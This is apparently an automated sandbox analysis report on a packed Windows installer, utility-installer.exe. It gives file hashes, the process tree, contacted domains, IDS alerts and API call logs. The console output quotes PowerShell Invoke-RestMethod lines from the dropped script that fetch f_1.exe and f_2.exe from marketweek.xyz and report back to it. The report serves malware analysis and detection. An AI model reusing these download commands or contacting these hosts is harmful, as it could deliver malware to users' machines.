Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 4, 2024, 11:14 a.m.	Oct. 4, 2024, 11:25 a.m.

Size	1.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`05bf0fb13746875a2b7b9082200f7dc0`
SHA256	`955b87b1362a37b052336359fddca6da6a6115ae29ac9485c48bf10238bda79d`
CRC32	`6981D505`
ssdeep	`24576:s7FUDowAyrTVE3U5F/9GqKRuKic6QL3E2vVsjECUAQT45deRV9Rj:sBuZrEUQGKIy029s4C1eH9x`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file mzp_file_format - MZP(Delphi) file format OS_Processor_Check_Zero - OS Processor Check

utility-installer.exe "C:\Users\test22\AppData\Local\Temp\utility-installer.exe"
1836
- utility-installer.tmp "C:\Users\test22\AppData\Local\Temp\is-QUJ1E.tmp\utility-installer.tmp" /SL5="$30028,922170,832512,C:\Users\test22\AppData\Local\Temp\utility-installer.exe"
  1940
  - cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\x64.bat""
    2164
    - powershell.exe Powershell.exe -executionpolicy remotesigned -File onesave.ps1
      2228
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
carriagesun.xyz	A 104.21.40.214 A 172.67.188.99	172.67.188.99
marketweek.xyz	A 172.67.211.92 A 104.21.93.149	172.67.211.92

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.188.99	Active	Moloch
172.67.211.92	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49176 -> 172.67.211.92:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 172.67.188.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49176 172.67.211.92:443	C=US, O=Google Trust Services, CN=WE1	CN=marketweek.xyz	30:7f:b7:8c:f9:69:12:0f:96:f2:5e:4e:bd:40:11:2d:ee:25:0c:c5
TLSv1 192.168.56.103:49164 172.67.188.99:443	C=US, O=Google Trust Services, CN=WE1	CN=carriagesun.xyz	0c:53:11:1c:34:df:ab:25:76:d8:db:8d:49:a0:c3:d9:61:87:88:c6

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 4, 2024, 11:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2024, 11:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2024, 11:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2024, 11:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 4, 2024, 11:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2024, 11:14 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 4, 2024, 11:15 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 4, 2024, 11:14 a.m.			0	0
IsDebuggerPresent Oct. 4, 2024, 11:14 a.m.			0	0

Command line console output was observed (50 out of 124 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\onesave.ps1:2 char:18 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + Invoke-RestMethod <<<< -URI "https://marketweek.xyz/julkiuf?tid=50784292&pid console_handle: 0x00000053	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: =4134&a=2910&cc=KR&t=1728008627" -UserAgent "InnoDownloadPlugin/1.5" -OutFile " console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: start" console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x00000077	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: ommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x000000af	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\onesave.ps1:10 char:18 console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + Invoke-RestMethod <<<< -URI "http://marketweek.xyz/kuiffghhy?paw=482857&spot console_handle: 0x000000df	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: =&a=2910&on=470&o=1695" -UserAgent "InnoDownloadPlugin/1.5" -OutFile "f_1.exe" console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: ommandNotFoundException console_handle: 0x00000103	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\onesave.ps1:31 char:20 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + Invoke-RestMethod <<<< -URI "http://marketweek.xyz/rlo.php?d=b&msg=" console_handle: 0x00000053	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: +$errCode+"&r=offer_execution_fail&ko=no&o=1695&a=2910&dn=470&spot=1&t=17280086 console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: 27" -UserAgent "InnoDownloadPlugin/1.5" -OutFile "stat" console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x00000077	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: ommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x000000af	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\onesave.ps1:42 char:18 console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + Invoke-RestMethod <<<< -URI "http://marketweek.xyz/kuiffghhy?paw=999853&spot console_handle: 0x000000df	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: =&a=2910&on=466&o=1693" -UserAgent "InnoDownloadPlugin/1.5" -OutFile "f_2.exe" console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: ommandNotFoundException console_handle: 0x00000103	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x0000012f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000013b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x00000147	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\onesave.ps1:70 char:20 console_handle: 0x00000153	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + Invoke-RestMethod <<<< -URI "http://marketweek.xyz/rlo.php?d=b&msg=" console_handle: 0x0000015f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: +$errCode+"&r=offer_execution_fail&ko=no&o=1693&a=2910&dn=466&spot=2&t=17280086 console_handle: 0x0000016b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: 27" -UserAgent "InnoDownloadPlugin/1.5" -OutFile "stat" console_handle: 0x00000177	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x00000183	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: ommandNotFoundException console_handle: 0x0000018f	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000019b	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x000001bb	1	1
WriteConsoleW Oct. 4, 2024, 11:14 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000001c7	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 51 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055f470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d51f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d51f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d51f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d5478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d5478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d5478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d5478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d5478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d5478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d51f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d53b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d54f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d55b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d55b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 4, 2024, 11:14 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00607e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 4, 2024, 11:14 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.itext
section	.didata

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 4, 2024, 11:15 a.m.	stacktrace: TMethodImplementationIntercept+0x1fcbea dbkFCallWrapperAddr-0x21bde utility-installer+0x2b2a62 @ 0x6b2a62 TMethodImplementationIntercept+0x1fcbea dbkFCallWrapperAddr-0x21bde utility-installer+0x2b2a62 @ 0x6b2a62 TMethodImplementationIntercept+0x2108fc dbkFCallWrapperAddr-0xdecc utility-installer+0x2c6774 @ 0x6c6774 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedfade exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1637804 registers.edi: 0 registers.eax: 1637804 registers.ebp: 1637884 registers.edx: 0 registers.ebx: 2 registers.esi: 2 registers.ecx: 7	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 4, 2024, 11:15 a.m.

stacktrace:

TMethodImplementationIntercept+0x1fcbea dbkFCallWrapperAddr-0x21bde utility-installer+0x2b2a62 @ 0x6b2a62
TMethodImplementationIntercept+0x1fcbea dbkFCallWrapperAddr-0x21bde utility-installer+0x2b2a62 @ 0x6b2a62
TMethodImplementationIntercept+0x2108fc dbkFCallWrapperAddr-0xdecc utility-installer+0x2c6774 @ 0x6c6774
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xeedfade
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1637804
registers.edi: 0
registers.eax: 1637804
registers.ebp: 1637884
registers.edx: 0
registers.ebx: 2
registers.esi: 2
registers.ecx: 7

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://marketweek.xyz/endroipe?tid=50784292&pid=4134&a=2910&cc=KR&t=1728008627

Performs some HTTP requests (3 events)

request	HEAD https://carriagesun.xyz/pe/start/index.php?a=2910&p=4134&t=50784292
request	GET https://carriagesun.xyz/pe/start/index.php?a=2910&p=4134&t=50784292
request	GET https://marketweek.xyz/endroipe?tid=50784292&pid=4134&a=2910&cc=KR&t=1728008627

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 745472 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 73728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02490000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e31000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
